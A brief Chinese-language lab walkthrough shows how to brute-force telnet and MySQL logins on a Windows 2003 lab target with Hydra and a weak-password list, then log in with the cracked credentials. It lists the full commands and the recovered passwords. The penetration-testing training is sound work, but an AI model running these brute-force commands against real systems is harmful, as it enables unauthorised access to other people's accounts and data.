任务环境说明:
渗透机: x2_kali-2-1(Kali) 用户名:root 密码:toor
靶机: x2_ws03-2-1(Windows 2003) 用户名:administrator 密码:123456
Hydra是一款开源暴力破解工具这是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。Burpsuite可以进行Web登录密码的破解,操作方便但在爆破密码方面还不够强大(毕竟非专业),Hydra功能强大支持的密码类型众多,足够使用,操作简单。
Hydra目前支持的破解服务有:FTP,MSSQL,MYSQL,POP3,SSH、TELNET等。
因为 Windows的管理员账号是administrator所以我们在用户名这里输入administrator,23端口是telnet端口,我们就在协议这里输入telnet,密码字典我选择的是弱密码Top1500的字典。输入完成回车就开始爆破。
hydra 172.16.1.200 telnet -l administrator -P Top1500.txt –vV
得知账号为 administrator,密码为123456
尝试远程连接 telnet
telnet 172.16.1.200
暴力破解 mysql
hydra 172.16.1.200 mysql -l root -P Top1500.txt –vV
破解得到账号为root,密码为root,我们尝试远程连接这个数据库看看
mysql -h 172.16.1.200 -uroot –proot